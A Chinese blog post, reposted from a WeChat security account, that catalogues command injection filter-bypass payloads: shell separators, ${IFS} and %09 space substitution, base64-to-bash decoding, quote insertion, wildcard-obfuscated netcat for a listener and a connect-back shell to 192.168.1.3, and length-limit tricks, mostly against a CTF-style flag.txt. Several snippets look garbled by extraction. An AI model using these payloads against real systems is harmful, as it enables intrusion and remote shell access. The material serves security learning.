前言
命令注入是web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。
常用符号
分号(;)
多条语句顺序执行时的分割符号。
1
|
cmd1;cmd2
|
管道符(|)
cmd1命令的输出,作为下一条命令cmd2的参数。
1
|
cmd1|cmd2
|
and(&&)
与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2
1
|
cmd1 && cmd2
|
or(||)
或命令,cmd1失败则执行cmd2,cmd1成功则不执行cmd2
1
|
cmd1 || cmd2
|
反引号()和$()
反引号和$()都可用来表示命令,被这两种方式包含的字符串都会被当做命令首先执行。
1
|
echo "result : `whoami`"
|
绕过方式总结
空格绕过
在过滤了空格的系统中,以cat flag.txt为例,系统不允许我们输入空格或输入后被过滤。
${IFS}
可使用${IFS}代替空格。
1
|
cat${IFS}flag.txt
|
重定向符绕过(<>)
1
|
cat<>flag.txt
|
%09(需要php环境)
php环境下web输入%09等效于空格
1
|
cat%09flag.txt
|
黑名单绕过
拼接
使用shell变量拼接被黑名单限制的关键词
1
|
a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;
|
base64
使用反引号包含base64解码后的命令
1
|
`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`
|
将base64解码后的命令通过管道符传递给bash
1
|
echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash
|
单引号,双引号
1
|
c""at fl''ag.tx""t
|
反斜杠
1
|
cat flag.txt
|
$1
1
|
ca$1t fl$1ag.t$1xt
|
读文件绕过
1
|
(1)more:一页一页的显示档案内容
|
通配符绕过
/???会去寻找 / 目录下的三个字符长度的文件,正常情况下会寻找到/bin,然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令,然后后面可以使用正常的通配符匹配所需读的文件,如flag.txt文件名长度为8,使用8个?’’,此命令就会读取所有长度为8的文件。
1
|
/???/?[a][t] ?''?''?''?''?''?''?''?''
|
同理,我们也可以匹配/bin下的其他命令,如more,less,vi,tail等命令来查看文件,或者执行其他命令。
1
|
/???/[m][o]?[e] ?''?''?''?''?''?''?''?''
|
1
|
/???/[t]?[i][l] ?''?''?''?''?''?''?''?''
|
甚至开启一个shell
1
|
/???/[n]?[t]??[t] -lvp 4444
|
1
|
/???/[n]?[t]??[t] 192.168.1.3 4444
|
命令嵌套
1
|
echo "result:`whoami`"
|
1
|
echo "result:$(uname -a)"
|
长度绕过
使用>>绕过长度限制
使用>>每次添加一部分命令到文件中
1
|
echo -n "cmd1" > r;
|
然后使用cat r | bash执行命令
使用换行执行和ls -t绕过长度限制
linux中,文件中的命令如果需要换行书写,需要在前一行末尾增加,如文件a中有
1
|
ca
|
使用sh a即可执行命令cat flag.txt
ls -t可根据时间创建顺序逆序输出文件名
a可以创建一个名为a的文件
按照这个思路,可以使用
1
|
> "ag"
|
然后使用ls -t > s
s中文件内容就是
1
|
s
|
之后使用sh s,即可执行cat flag
作者:Leticia,来源:Leticia's Blog
一如既往的学习,一如既往的整理,一如即往的分享。感谢支持
【好书推荐】
扫描关注LemonSec
本文始发于微信公众号(LemonSec):命令注入绕过方式总结
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
2021年7月9日 下午10:43 1F
学习了